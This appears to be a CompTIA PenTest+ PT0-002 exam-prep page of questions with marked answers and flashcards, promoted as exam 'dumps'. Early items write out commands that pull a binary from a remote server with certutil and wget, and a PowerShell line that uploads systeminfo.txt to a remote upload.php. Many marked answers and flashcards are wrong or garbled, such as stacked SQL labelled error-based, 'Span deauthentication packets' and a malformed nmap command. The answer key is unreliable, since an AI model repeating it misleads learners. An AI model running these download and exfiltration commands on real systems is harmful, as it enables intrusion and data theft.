CompTIA PenTest+ PT0-002 Exam Preparation

Questions and Answers

Which vulnerability allows a tester to obtain credentials by querying a cloud provider's metadata?

• Server-side request forgery (correct)
• Local file inclusion
• Remote file inclusion
• Cross-site request forgery

What command can a penetration tester use to download a file from a remote server to assist in exploring service permissions?

• wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
• schtasks /query /fo LIST /v | find /I “Next Run Time:”
• powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
• certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe (correct)

Which command would a penetration tester use to perform a ping scan on a subnet?

• nmap -sn 10.12.1.0/24 (correct)
• nmap -sV -A 10.12.1.0/24
• nmap -Pn 10.12.1.0/24
• nmap -sT -p- 10.12.1.0/24

What is the most effective recommendation to secure a wireless network after an unauthorized access event using Aircrack-ng?

Changing to Wi-Fi equipment that supports strong encryption (A)

Which benefit does the command 'schtasks /query /fo LIST /v | find /I “Next Run Time:”' provide when exploring service permissions?

Lists all scheduled tasks and their next run times (C)

What aspect of testing does server-side request forgery highlight when accessing cloud provider metadata?

Obtaining sensitive environment data (D)

What is the best method for a penetration tester to pivot and gain additional access to a network when faced with restrictive ACLs on a wireless subnet?

Span deauthentication packets to the wireless clients. (D)

Which approach is NOT recommended to enhance wireless security?

Using WEP encryption (D)

What likely caused all 65,535 ports to be reported as filtered during a second Nmap scan?

A firewall or IPS blocked the scan. (A)

Which tool provides an exploitation suite with payload modules covering the broadest range of target system types?

Metasploit (A)

What impact does using 'nmap -sV -A 10.12.1.0/24' have when assessing a network?

It provides versioning and OS detection for services running on hosts (B)

Which tool combination would be most effective for preparing an attack after discovering a PHP script in a vulnerable state?

Burp Suite and DIRB (A)

What does the -F option in an Nmap scan refer to?

Fast scan that checks only common ports. (B)

If a penetration tester finds a PHP script in an unprotected internal repository, what should be the primary concern?

The script may contain security vulnerabilities. (A)

Which of the following responses is NOT a potential countermeasure a firewall might perform during a network scan?

Automatically updating signature definitions. (B)

In the context of penetration testing, what is an 'evil twin' attack?

A technique of impersonating a legitimate access point. (C)

After discovering a vulnerability and failing to report it, what is the appropriate next step for the company?

Investigate the penetration tester (D)

What should a company verify first when it wants to test the security of its hosted data after obtaining permission from a cloud service provider?

Whether sensitive client data is publicly accessible (A)

What is an example of a Bluesnarfing attack that a penetration tester could perform?

Dump the user address book on the device (D)

Why is it critical for companies to thoroughly investigate after a breach has occurred?

To determine the cause and prevent future incidents (D)

Which of the following is NOT a recommended action after notifying a client about a data breach?

Increase marketing efforts to regain client trust (A)

What outcomes can a poorly executed penetration test lead to?

Unauthorized access to sensitive data (A)

What action should be prioritized to ensure client data is protected in a cloud environment?

Strict access controls (C)

What is the primary goal of conducting a vulnerability scan?

To identify potential security weaknesses (C)

Which of the following actions would be considered unethical according to the SOW? (Select two)

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team (B), Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address (C)

What is the most likely reason for receiving TCP resets during the assessment of web servers?

The web server is using a Web Application Firewall (WAF) (B)

What should a penetration tester do with client findings after an engagement according to the SOW?

Dispose of findings by erasing them in a secure manner (A)

Which behavior aligns with ethical standards when working with a client’s confidential information?

Encrypting findings before delivering them to the client (A)

In the context of the SOW, which of the following actions could be potentially harmful to the client's security?

Disregarding security protocols of the engagement (B)

When a WAF resets a TCP connection, what is it likely responding to?

Malformed packets or suspected attacks (C)

What is a primary responsibility of a penetration tester concerning client confidentiality?

Maintaining confidentiality of sensitive information regarding the client (B)

Which practice could lead to ethical violations in penetration testing?

Failing to report critical vulnerabilities to the client (D)

Which tool is the penetration tester MOST likely to use for performing a vulnerability scan against a web server?

Nikto (A)

What type of SQL injection attack is indicated by the input '1;SELECT Username, Password FROM Users;'?

Error-based (C)

Based on Nmap scan results, which operating system is the target MOST likely running if the scan points to Windows features?

Windows Server (C)

Which Nmap command correctly scans for UDP services SNMP, NetBIOS, and DNS?

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan (C)

What should a company do NEXT if security alarms are triggered during a penetration test?

Contact law enforcement. (D)

Which scenario BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

The IP address is on the blocklist. (A)

In which scenario would a penetration tester most likely use Nmap?

To perform a network discovery. (A)

Which of the following correctly represents a limitation of penetration testing?

It can only evaluate known vulnerabilities. (C)

What is the primary reason for TCP resets from a web server when a WAF is present?

The WAF is blocking legitimate traffic. (B)

Which recommendation should a penetration tester make to address the use of vulnerable third-party modules in products?

Add a dependency checker into the tool chain. (B)

What change is necessary for fixing the Perl script used to identify vulnerabilities in network switches?

Remove unnecessary variables and streamline the code. (B)

Which tool should be used to pass the hash once password hashes are extracted from lsass.exe?

Mimikatz (D)

What is the most effective way to ensure the security of API settings before a deployment?

Implement strict validation protocols. (B)

What tool is recommended for achieving persistence after passing the hash?

WMI (A)

Which option describes a common outcome when a penetration tester uses a dependency checker during the software development process?

Detecting and addressing known vulnerabilities in libraries. (B)

What is a critical step to ensure the Perl script runs properly?

Modifying specific lines to correct initialization. (A)

Flashcards

Pivot Attack Method (Wireless Subnet)

Gaining access to a network by exploiting a vulnerability to move from a compromised system (e.g. a laptop) to a wider network

Nmap Scan Flags (filtered ports)

Nmap flags used in a scan that indicates all ports are filtered by a firewall or Intrusion Prevention System (IPS).

Comprehensive Exploitation Suite

A software tool that is designed to enable complete penetration testing.

Web Application Vulnerability (PHP)

Vulnerability found in a PHP web application script that could be exploited in an unprotected source repository.

Penetration Testing Toolset (PHP)

Tools that assist in preparing for attacks on web application vulnerabilities caused by PHP code.

Port Scanning (Nmap -F)

Fast scan using Nmap, checks a small number of common ports to quickly assess if a service responds.

Evil Twin Attacks

Creating a fake wireless access point that mimics a legitimate one and lures users into connecting to it.

De-authentication

A wireless attack that forces the disconnection of a wireless client

Server-Side Request Forgery (SSRF)

An attack where an attacker tricks a server into making requests to other servers on the network.

Exploiting Instance Credentials (metadata)

Gaining access to cloud server credentials by querying cloud provider metadata.

Low-Privilege Shell

A type of shell account with limited access on a system.

Misconfigured Service Permissions

Vulnerability where a service has more permissions than it should, a security misconfiguration.

Ping Scan

A network scan technique that uses ICMP echo requests to discover live hosts on a network.

Wireless Network Remediation

Actions to secure a wireless network, typically addressing weak encryption.

Impersonating IT Help Desk

Using deception to gain access to sensitive information or control.

Strong Encryption (Wi-Fi)

Using robust encryption protocols (like WPA2/3) to secure wireless transmissions.

Penetration Tester's Responsibility

A penetration tester is responsible for identifying and reporting vulnerabilities in a system. Failing to report a vulnerability and leaving it unfixed is unethical and potentially harmful.

Vulnerability Scan Permission

Before scanning a system, verify that permission has been obtained from the appropriate parties, especially the cloud service provider.

Initial Risk Assessment Focus

First, evaluate if sensitive data is publicly accessible in a hosted environment to assess a critical risk that affects data confidentiality.

Bluesnarfing Attack

Bluesnarfing is an attack method where a penetration tester can gain unauthorized access to the information stored on a Bluetooth-enabled mobile device. This allows them to access personal information.

Unauthorized Access

Gaining access to a system, network, or data without official permission.

Data Confidentiality

Protecting sensitive data from unauthorized access or disclosure

Penetration Test Follow-Up

After a penetration test, the appropriate action is to investigate who is potentially accountable for a vulnerability and its associated issues.

Secure SDLC

Secure Software Development Lifecycle (SDLC) is a process to design, develop, and deploy applications following security standards in phases.

Unethical Penetration Tester Behavior

Actions that violate professional ethics, potentially harming the client or compromising security.

Proprietary Penetration Testing Tools

Tools not publicly available or accessible to the client for review.

Hiding Critical Vulnerabilities

Failure to report critical security flaws in a client's system to please senior management, potentially jeopardizing the system's security.

Using Underground Forums

Seeking assistance from hacker forums for engagements, potentially exposing client information.

TCP Resets During Assessment

Web server disconnecting connections abruptly during a penetration test, often caused by a Web Application Firewall (WAF).

Web Application Firewall (WAF)

A security system designed to protect web applications from attacks by filtering traffic.

Client Confidential Information

Data like network diagrams, asset inventory, and employee names that are confidential.

Secure Disposal of Findings

Properly erasing or deleting findings after the penetration testing engagement using secure methods.

Nikto

A web server vulnerability scanner used by penetration testers to identify potential security weaknesses.

Error-Based SQL Injection

A type of SQL injection attack where the attacker injects malicious SQL code and observes the server's error messages to gain information about the database structure.

Nmap Scan for UDP Services

Using Nmap to scan specific UDP ports for running services like SNMP, NetBIOS, and DNS.

Penetration Test Deconfliction

The process of coordinating with the organization being tested to ensure the test doesn't cause unwanted disruptions or security alerts.

Blocked IP Address

An IP address that is prevented from accessing a network or server due to security rules or blacklisting.

WAF and TCP Resets

A Web Application Firewall (WAF) may cause TCP reset packets to be sent back to a penetration tester during scanning. This happens because the WAF is actively blocking or filtering malicious requests.

Dependency Checker

A tool that analyzes software code to identify and report on the use of vulnerable third-party libraries or modules. This helps developers avoid security issues by ensuring that their code uses safe and up-to-date components.

Vulnerable Third-Party Modules

Software components created by other companies and used within a larger application. If these modules have known weaknesses (vulnerabilities), they can expose the entire application to security risks.

Mimikatz

A tool often used by penetration testers to extract logon passwords from the memory of a target system. It can retrieve credentials stored in the LSASS (Local Security Authority Subsystem Service) process.

Pass the Hash

A technique used to gain unauthorized access to a system by leveraging stolen password hashes. Instead of cracking the hash and getting the actual password, the attacker directly uses the hash to authenticate.

Persistence (Penetration Testing)

The ability of an attacker to maintain access and control over a compromised system even after a reboot or system changes. It involves establishing a backdoor or setting up mechanisms for re-gaining access.

PsExec

A tool often used in combination with Mimikatz to execute commands or programs on remote systems using stolen credentials. It allows attackers to maintain persistence and control.

Empire

A post-exploitation framework used by penetration testers to establish and maintain persistence on a compromised system. It provides a variety of tools and techniques for monitoring and controlling the target.

Study Notes

CompTIA PenTest+ PT0-002 Dumps

• CertLeader provides 100% valid and up-to-date practice questions and answers for the CompTIA PenTest+ certification exam (PT0-002).
• The dumps contain 253 questions and answers.
• The website provides links to access the practice materials.
• The dumps cover the CompTIA PenTest+ certification exam.

Description

Get ready for your CompTIA PenTest+ PT0-002 exam with our comprehensive practice questions and answers. This quiz includes 253 valid and up-to-date questions, designed to help you succeed in your certification goals. Access the best preparatory materials to boost your confidence and performance on exam day.